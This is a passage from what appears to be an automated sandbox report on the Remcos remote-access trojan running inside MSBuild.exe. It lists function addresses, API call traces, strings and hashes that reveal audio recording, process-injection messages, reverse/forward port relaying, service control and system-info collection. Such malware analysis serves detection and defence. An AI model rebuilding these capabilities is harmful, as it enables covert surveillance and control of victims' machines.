                                                                                                                        • Opcode Fuzzy Hash: 39b3ce55d3e57c7dd47d2fbf93a6b3f51a62715a063ab856270c8441b234f796
                                                                                                                        • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                        Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                        • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                                        • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                        • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                                        Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                        • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3658366068-0
                                                                                                                        • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                        • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                                        • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                        • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                                        Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                                        • GetLastError.KERNEL32 ref: 00454A96
                                                                                                                        • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                                        • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                                        • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                                        • GetLastError.KERNEL32 ref: 00454C58
                                                                                                                        • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                        • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                                        • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                                        • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                                        • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                                        Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 65535$udp
                                                                                                                        • API String ID: 0-1267037602
                                                                                                                        • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                        • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                                        • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                        • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                                        Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                                        • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                                        • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                                        • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                                        • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                        • _free.LIBCMT ref: 0043946A
                                                                                                                        • _free.LIBCMT ref: 00439471
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2441525078-0
                                                                                                                        • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                                                        • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                                        • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                                                        • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                                        Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                        • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                        • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                        • API String ID: 2956720200-749203953
                                                                                                                        • Opcode ID: 0a8cfa12567f3aee5b36ed63fcb2901dca7d6d53f6b53b69f7828746b288e178
                                                                                                                        • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                                        • Opcode Fuzzy Hash: 0a8cfa12567f3aee5b36ed63fcb2901dca7d6d53f6b53b69f7828746b288e178
                                                                                                                        • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                                        Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                        • String ID: <$@$@FG$@FG$Temp
                                                                                                                        • API String ID: 1107811701-2245803885
                                                                                                                        • Opcode ID: 72b6f248338ad01abce2a85042f135eebbc81b4a8627105bc11ff778a7ce6486
                                                                                                                        • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                        • Opcode Fuzzy Hash: 72b6f248338ad01abce2a85042f135eebbc81b4a8627105bc11ff778a7ce6486
                                                                                                                        • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                        Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                        • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentProcess
                                                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                        • API String ID: 2050909247-4145329354
                                                                                                                        • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                        • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                                        • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                        • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                                        Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 221034970-0
                                                                                                                        • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                        • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                        • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                        • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                        Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00446DDF
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        • _free.LIBCMT ref: 00446DEB
                                                                                                                        • _free.LIBCMT ref: 00446DF6
                                                                                                                        • _free.LIBCMT ref: 00446E01
                                                                                                                        • _free.LIBCMT ref: 00446E0C
                                                                                                                        • _free.LIBCMT ref: 00446E17
                                                                                                                        • _free.LIBCMT ref: 00446E22
                                                                                                                        • _free.LIBCMT ref: 00446E2D
                                                                                                                        • _free.LIBCMT ref: 00446E38
                                                                                                                        • _free.LIBCMT ref: 00446E46
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                        • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                                        • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                        • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                                        Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Eventinet_ntoa
                                                                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                        • API String ID: 3578746661-4192532303
                                                                                                                        • Opcode ID: 3c37e0140b29215e1cc5bf095320872d24a2e6ca36ee35567f4ef7189c3101bb
                                                                                                                        • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                                        • Opcode Fuzzy Hash: 3c37e0140b29215e1cc5bf095320872d24a2e6ca36ee35567f4ef7189c3101bb
                                                                                                                        • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                                        Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DecodePointer
                                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                                        • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                                        • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                                        • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                                        • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                                        Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                        • API String ID: 1462127192-2001430897
                                                                                                                        • Opcode ID: 17781720042e8dd5f6383a37f316ae78f39f246e06b2fe8c00021d6916931921
                                                                                                                        • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                                        • Opcode Fuzzy Hash: 17781720042e8dd5f6383a37f316ae78f39f246e06b2fe8c00021d6916931921
                                                                                                                        • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                                        Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _strftime.LIBCMT ref: 00401AD3
                                                                                                                          • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                        • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                        • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                        • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                        • API String ID: 3809562944-3643129801
                                                                                                                        • Opcode ID: 6ae21cb00cef94fe011206d91043368fb3a1eea725e775b212b5f58a868d8104
                                                                                                                        • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                                        • Opcode Fuzzy Hash: 6ae21cb00cef94fe011206d91043368fb3a1eea725e775b212b5f58a868d8104
                                                                                                                        • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                                        Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                        • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                        • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                        • waveInStart.WINMM ref: 00401A81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                        • String ID: XCG$`=G$x=G
                                                                                                                        • API String ID: 1356121797-903574159
                                                                                                                        • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                                        • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                                        • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                                        • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                        Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                                          • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                          • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                          • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                                        • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                                        • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                                        • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                                        • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                        • String ID: Remcos
                                                                                                                        • API String ID: 1970332568-165870891
                                                                                                                        • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                        • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                                        • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                        • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                        Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                                        • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                                        • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
